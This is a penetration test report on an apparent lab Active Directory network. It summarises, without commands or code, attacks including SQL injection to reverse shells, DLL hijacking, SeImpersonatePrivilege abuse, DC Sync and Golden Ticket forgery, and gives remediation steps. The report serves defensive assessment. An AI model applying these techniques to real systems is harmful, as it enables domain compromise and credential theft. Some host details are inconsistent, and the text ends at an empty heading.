AD.LAB Internal and Web Application Penetration Test Report

Engagement Dates: February 3, 2025 – February 6, 2025

Report Date: February 9, 2025

Prepared for: AD.LAB Security Team

Prepared by: Andrew Lobenstein

Table of Contents

1. Executive Summary

Purpose and Objectives

The AD.LAB penetration test was conducted to evaluate the security posture of both external web applications and the internal Active Directory (AD) environment. Our primary objectives were to identify critical vulnerabilities, assess lateral movement and privilege escalation vectors, and provide actionable recommendations to remediate these issues.

Key Highlights

• SQL Injection in Web Login Forms: Both WEB01 and WEB02 were vulnerable to SQL injection, enabling attackers to bypass authentication, write files (e.g. a web shell), and trigger system‐level commands (via xp_cmdshell) to download utilities and spawn reverse shells.
• Unquoted Service Path Vulnerability: A service (BetaService) was configured with an unquoted executable path containing spaces. A malicious replacement binary was uploaded and executed with SYSTEM privileges.
• Insecure WebDAV and Email Relay Abuse: The WsgiDAV server (MAIL01) was misconfigured to allow anonymous read–write access. This enabled file uploads (including a Windows Library file and a PowerShell shortcut with a reverse shell payload) and the abuse of SMTP relay to stage remote code execution.
• Service File Replacement / DLL Hijacking: On DEV01 and ADMIN01, improper file permissions allowed the attacker to replace legitimate executables and DLLs, causing malicious payloads to run on system reboot or service restart.
• Abuse of SeImpersonatePrivilege: The nt service\mssqlserver account had SeImpersonatePrivilege enabled, which was exploited using the SigmaPotato tool to spawn a SYSTEM-level reverse shell on ADMIN04.
• Unrestricted DCOM Remote Command Execution: Insecure DCOM configurations allowed remote instantiation of COM objects. An instance of MMC20.Application was created on ADMIN02 to execute encoded PowerShell commands remotely.
• Credential Exposure and Misconfigured Document Storage: Sensitive credentials were exposed through improperly secured environment variables and Office documents. Extracted Office document hashes were cracked to recover credentials used for further exploitation.
• Weak/Misconfigured File and Service Permissions: Several systems allowed unauthorized replacement of service executables or missing files (e.g., NewService.dll), enabling remote code execution upon service restart.
• DC Sync Abuse and Golden Ticket Generation: DC Sync was used to dump high-privilege account hashes. The extracted AES key was then used to forge a Golden Ticket, providing persistent domain access.
• Misconfigured Remote Management and RDP Settings: Registry and firewall settings were modified to enable RDP and WMI access remotely, even on systems where these features were originally disabled.
• Excessive Permissions on SMB Shares: Overly permissive SMB shares (such as DomainAdminsShare on FILES01) allowed an attacker to access sensitive data.
• Scheduled Task and Remote Service Abuse: The attacker created scheduled tasks and new services that executed reverse shell payloads, furthering lateral movement and privilege escalation.
• Mimikatz for Privilege Escalation and Credential Dumping: Mimikatz was used to extract password hashes and Kerberos keys from LSASS, facilitating additional attacks.
• Golden Ticket Attacks: Weak key management allowed the creation of forged Kerberos tickets, enabling indefinite authentication as a high-privilege account.

Overall Risk and Impact

The vulnerabilities identified pose a High/Critical risk. An attacker could leverage these weaknesses to gain full domain control, exfiltrate sensitive data, deploy ransomware, and cause significant reputational and operational damage.

2. Scope and Engagement Details

In-Scope Systems and Services

The assessment included the following systems:

• WEB01: Public-facing web server (10.10.14.20)
• WEB02: Authenticated web application (web02.ad.lab)
• DMZ01: Internal Windows host for lateral movement
• MAIL01: SMTP mail server
• DEV01, ADMIN01, ADMIN02, ADMIN03, ADMIN04: Internal Windows endpoints
• DC01: Primary Domain Controller
• FILES01: File server hosting SMB shares

Out-of-Scope Items

Systems or networks not explicitly listed above were excluded. The assessment was limited to the approved testing window and did not involve any destructive or denial-of-service testing.

Constraints and Assumptions

Testing was conducted from February 3 to February 6, 2025. Authorization was provided for simulated Domain Administrator actions under strict engagement rules.

3. Methodology

Our testing approach was based on industry standards (PTES and NIST SP 800‑115) and comprised the following phases:

1. Reconnaissance & Information Gathering: We performed active and passive scanning (using tools such as Nmap, WhatWeb, and DNS queries) to identify and map in‑scope systems and services.
2. Threat Modeling & Vulnerability Identification: Vulnerability assessments and manual testing uncovered misconfigurations and code injection flaws, particularly in web login forms and Active Directory configurations.
3. Exploitation: We simulated attacks by exploiting SQL injection vulnerabilities to bypass authentication, write files (web shells), and trigger system-level commands. Additionally, we exploited misconfigured services, weak file permissions, and insecure remote management settings.
4. Post-Exploitation & Lateral Movement: Using techniques such as DC Sync, ticket forgery (both Silver and Golden Tickets), and abuse of privileges (e.g., SeImpersonatePrivilege, DCOM), we demonstrated how an attacker could move laterally and escalate privileges across the network.
5. Reporting & Remediation: All findings were documented at a high level, with remediation recommendations provided to reduce risk and strengthen the overall security posture.

4. Risk Assessment and Overall Findings

Our high-level risk matrix was based on both technical severity and potential business impact. Key findings include:

The overall risk to the AD.LAB environment is assessed as High/Critical given the possibility for an attacker to gain fullDomain Administrator privileges.

5. Detailed Technical Findings

The following sections provide a high-level explanation of the vulnerabilities identified, the attacks performed, and their overall impact. (Detailed commands and tool outputs are provided separately.)

1. SQL Injection in Web Login Forms (WEB01 & WEB02): The login forms were not properly sanitized, allowing:
   • Injection of SQL payloads to bypass authentication.
   • File writing (e.g., planting a web shell such as shell.php) for remote code execution.
   • Triggering of system-level commands via xp_cmdshell to download utilities (e.g. nc.exe) and spawn reverse shells.
2. Unquoted Service Path Vulnerability (BetaService): A service was configured with an unquoted executable path that contained spaces. An attacker replaced the legitimate binary with a malicious payload (Beta.exe), which executed with SYSTEM privileges upon service restart.
3. Insecure WebDAV Configuration and Email Relay Abuse: The WsgiDAV server (MAIL01) allowed anonymous read–write access. This enabled:
   • Uploading of files such as a Windows Library file and a PowerShell shortcut (with a reverse shell payload) to the WebDAV share.
   • Using SMTP relay (via a tool like swaks) to send emails with these malicious attachments to stage remote code execution.
4. Service File Replacement / DLL Hijacking: Improper file permissions on DEV01 and ADMIN01 allowed the replacement of legitimate service executables or DLLs. The attacker:
   • Replaced a service’s executable with a malicious payload that executed upon reboot or service restart.
   • Downloaded and placed a missing DLL (NewService.dll) into the service directory, then started the service to spawn a reverse shell as SYSTEM.
5. Abuse of SeImpersonatePrivilege: The nt service\mssqlserver account had the SeImpersonatePrivilege enabled. This was exploited using SigmaPotato to impersonate a SYSTEM-level token and spawn a reverse shell on WEB02.
6. Unrestricted DCOM Remote Command Execution: Insecure DCOM settings allowed remote instantiation of COM objects. An attacker created an instance of the MMC20.Application COM object on ADMIN02 and used its shell-execution method to run base64-encoded PowerShell commands.
7. Credential Exposure and Misconfigured Document Storage: Sensitive credentials were inadvertently exposed (e.g., in environment variables and Office documents). Office document hashes were extracted and cracked (via hashcat) to recover credentials, which were then used to create scheduled tasks and new services that furthered lateral movement.
8. Weak or Misconfigured File/Service Permissions Allowing Replacement: Several systems (DEV01, ADMIN02, ADMIN01) had service directories with insufficient protections, allowing:
   • Replacement of legitimate executables with malicious payloads.
   • Insertion of missing DLLs that triggered remote code execution when the service restarted.
9. DC Sync Abuse and Golden Ticket Generation: The domain controller (DC01) allowed replication requests (DC Sync) and had exposed AES keys. Using mimikatz, high-privilege account hashes (e.g., for Administrator and krbtgt) were dumped, and a Golden Ticket was forged using a custom tool, enabling persistent AD access.
10. Misconfigured Remote Management and RDP Settings: Although remote management features were initially disabled, registry settings and firewall rules were modified to enable RDP and WMI. This allowed an attacker to remotely execute commands (using WMIC and wmiexec) on critical systems such as DC01.
11. Excessive Permissions on SMB Shares and Sensitive Data Exposure: An SMB share (e.g., DomainAdminsShare on FILES01) was misconfigured with overly permissive access, allowing an attacker (using a forged ticket) to enumerate and retrieve sensitive documents, including the domain flag.
12. Scheduled Task and Remote Service Abuse for Code Execution: The environment allowed the creation of scheduled tasks and remote services without sufficient restrictions. This was abused to:
    • Create scheduled tasks that executed encoded PowerShell commands to download and run reverse shell payloads.
    • Create new services that, when started, executed malicious code and provided Domain Admin shells.
13. Mimikatz for Privilege Escalation and Credential Dumping: With administrative access, mimikatz was used to extract password hashes and Kerberos keys from LSASS, enabling further lateral movement and the forging of tickets.
14. Golden Ticket Attacks Against the Domain: Weak key management enabled the forging of Kerberos tickets. Using the extracted AES256 key and the domain SID, a Golden Ticket was generated, providing indefinite access to the AD environment.

6. Recommendations and Remediation Roadmap

Immediate Actions (0–30 Days)

• Web Applications: Implement input validation and parameterized queries; remove unnecessary write permissions from web directories.
• SQL Server: Disable or restrict the use of xp_cmdshell and use secure query practices.
• Active Directory: Enable Kerberos preauthentication for all accounts; review and remediate unquoted service paths.
• SMTP and WebDAV: Secure the WsgiDAV configuration by disabling anonymous access and enforcing authentication; restrict SMTP relay to trusted networks.

Short-Term Actions (30–90 Days)

• Deploy a Web Application Firewall (WAF) to detect and block injection attempts.
• Harden WinRM, SMB, and WMI configurations to limit lateral movement.
• Update file and service permissions to prevent unauthorized replacement of executables and DLLs.
• Restrict and monitor the use of sensitive privileges such as SeImpersonatePrivilege.

Long-Term Actions (90+ Days)

• Conduct regular (quarterly) security assessments and penetration tests.
• Implement continuous monitoring and advanced threat detection within the AD environment.
• Provide ongoing security training on modern AD attack vectors and defense strategies.
• Establish and routinely update an incident response plan, including rapid credential resets and ticket invalidation procedures.

7. Conclusion

The AD.LAB penetration test uncovered a wide array of vulnerabilities that, if exploited by an adversary, could lead to full domain compromise. Our assessment demonstrated that the web applications were vulnerable to SQL injection, allowing remote code execution and credential harvesting. Additionally, misconfigurations in service paths, remote management, file permissions, and the use of powerful privileges (such as SeImpersonatePrivilege) enabled extensive lateral movement and privilege escalation.

Critical attacks, such as DC Sync abuse and Golden Ticket forgery, illustrate the potential for an attacker to achieve persistent and indefinite access to the AD environment. Immediate remediation, as outlined in this report, is essential to prevent exploitation and secure the AD.LAB network.

8. Appendices

Detailed technical evidence—including command logs, tool outputs, and screenshots—has been compiled in separate appendices:

• Appendix A: WEB01 Detailed Evidence
• Appendix B: WEB02 Detailed Evidence
• Appendix C: DMZ01 Evidence
• Appendix D: MAIL01 Evidence
• Appendix E: DEV01 Evidence
• Appendices F–I: ADMIN01–ADMIN04 Evidence
• Appendix J: DC01 Evidence
• Appendix K: FILES01 Evidence

9. References

1. PTES (Penetration Testing Execution Standard)
2. NIST SP 800‑115: Technical Guide to Information Security Testing
3. MITRE ATT&CK Framework – Active Directory Techniques
4. OWASP Top 10 – Web Application Vulnerabilities
5. Impacket Documentation and GitHub Repository
6. Microsoft Security Guidance on Kerberos, WinRM, and SMB Hardening
7. Mimikatz Documentation – DC Sync and Ticket Forgery Techniques

10. Enumeration & Exploitation Steps